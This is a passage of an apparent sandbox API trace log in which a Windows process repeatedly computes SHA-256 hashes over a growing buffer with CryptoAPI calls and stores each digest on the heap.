	[0250.422] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c3028, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c3028, pdwDataLen=0x128c3c) returned 1
	[0250.422] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.422] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.422] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.422] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.422] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0x100, dwFlags=0x0) returned 1
	[0250.422] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.422] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c3050
	[0250.422] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x27c3050, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c3050, pdwDataLen=0x128c3c) returned 1
	[0250.422] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.422] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.422] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.423] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.423] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0x120, dwFlags=0x0) returned 1
	[0250.423] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.423] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c3078
	[0250.423] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c3078, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c3078, pdwDataLen=0x128c3c) returned 1
	[0250.423] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.423] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.423] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.423] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.423] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0x140, dwFlags=0x0) returned 1
	[0250.423] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.423] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c30a0
	[0250.423] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x27c30a0, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c30a0, pdwDataLen=0x128c3c) returned 1
	[0250.423] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.423] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.423] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.424] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.424] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0x160, dwFlags=0x0) returned 1
	[0250.424] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.424] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c30c8
	[0250.424] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c30c8, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c30c8, pdwDataLen=0x128c3c) returned 1
	[0250.424] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.424] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.424] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.424] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.424] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0x180, dwFlags=0x0) returned 1
	[0250.424] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.424] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c30f0
	[0250.424] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x27c30f0, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c30f0, pdwDataLen=0x128c3c) returned 1
	[0250.424] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.424] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.424] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.425] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.425] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0x1a0, dwFlags=0x0) returned 1
	[0250.425] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.425] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c3118
	[0250.425] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c3118, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c3118, pdwDataLen=0x128c3c) returned 1
	[0250.425] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.425] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.425] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.425] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.425] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0x1c0, dwFlags=0x0) returned 1
	[0250.425] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.425] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c3140
	[0250.425] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x27c3140, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c3140, pdwDataLen=0x128c3c) returned 1
	[0250.425] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.425] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.425] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.426] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.426] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0x1e0, dwFlags=0x0) returned 1
	[0250.426] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.426] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c3168
	[0250.426] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c3168, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c3168, pdwDataLen=0x128c3c) returned 1
	[0250.426] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.426] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.426] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.426] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.426] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0x200, dwFlags=0x0) returned 1
	[0250.426] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.426] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c3190
	[0250.426] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x27c3190, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c3190, pdwDataLen=0x128c3c) returned 1
	[0250.426] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.426] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.426] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.427] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.427] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0x220, dwFlags=0x0) returned 1
	[0250.427] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.427] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c31b8
	[0250.427] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c31b8, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c31b8, pdwDataLen=0x128c3c) returned 1
	[0250.427] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.427] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.427] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.428] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.428] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0x240, dwFlags=0x0) returned 1
	[0250.428] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.428] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c31e0
	[0250.428] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x27c31e0, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c31e0, pdwDataLen=0x128c3c) returned 1
	[0250.428] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.428] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.428] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.428] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.428] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0x260, dwFlags=0x0) returned 1
	[0250.428] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.428] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c3208
	[0250.428] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c3208, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c3208, pdwDataLen=0x128c3c) returned 1
	[0250.428] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.428] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.428] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.436] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.436] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0x280, dwFlags=0x0) returned 1
	[0250.436] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.436] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c3230
	[0250.436] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x27c3230, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c3230, pdwDataLen=0x128c3c) returned 1
	[0250.436] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.436] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.436] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.437] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.437] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0x2a0, dwFlags=0x0) returned 1
	[0250.437] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.437] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c3258
	[0250.437] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c3258, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c3258, pdwDataLen=0x128c3c) returned 1
	[0250.437] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.437] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.437] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.437] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.437] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0x2c0, dwFlags=0x0) returned 1
	[0250.437] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.437] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c3280
	[0250.437] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x27c3280, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c3280, pdwDataLen=0x128c3c) returned 1
	[0250.437] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.437] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.437] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.438] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.438] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0x2e0, dwFlags=0x0) returned 1
	[0250.438] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.438] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c32a8
	[0250.438] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c32a8, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c32a8, pdwDataLen=0x128c3c) returned 1
	[0250.438] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.438] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.438] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.438] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.438] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0x300, dwFlags=0x0) returned 1
	[0250.438] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.438] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c32d0
	[0250.438] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x27c32d0, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c32d0, pdwDataLen=0x128c3c) returned 1
	[0250.438] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.438] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.438] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.439] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.439] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0x320, dwFlags=0x0) returned 1
	[0250.439] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.439] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c32f8
	[0250.439] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c32f8, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c32f8, pdwDataLen=0x128c3c) returned 1
	[0250.439] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.439] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.439] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.439] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.439] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0x340, dwFlags=0x0) returned 1
	[0250.439] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.439] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c3320
	[0250.439] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x27c3320, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c3320, pdwDataLen=0x128c3c) returned 1
	[0250.439] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.439] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.439] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.440] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.440] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0x360, dwFlags=0x0) returned 1
	[0250.440] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.440] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c3348
	[0250.440] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c3348, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c3348, pdwDataLen=0x128c3c) returned 1
	[0250.440] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.440] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.440] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.440] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.440] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0x380, dwFlags=0x0) returned 1
	[0250.440] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.440] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c3370
	[0250.440] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x27c3370, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c3370, pdwDataLen=0x128c3c) returned 1
	[0250.440] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.440] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.440] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.441] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.441] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0x3a0, dwFlags=0x0) returned 1
	[0250.441] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.441] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c3398
	[0250.441] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c3398, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c3398, pdwDataLen=0x128c3c) returned 1
	[0250.441] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.441] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.441] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.441] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.441] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0x3c0, dwFlags=0x0) returned 1
	[0250.441] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.441] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c33c0
	[0250.441] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x27c33c0, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c33c0, pdwDataLen=0x128c3c) returned 1
	[0250.441] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.441] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.441] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.442] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.442] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0x3e0, dwFlags=0x0) returned 1
	[0250.442] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.442] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c33e8
	[0250.442] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c33e8, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c33e8, pdwDataLen=0x128c3c) returned 1
	[0250.442] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.442] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.442] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.442] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.442] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0x400, dwFlags=0x0) returned 1
	[0250.442] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.442] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c3410
	[0250.442] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x27c3410, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c3410, pdwDataLen=0x128c3c) returned 1
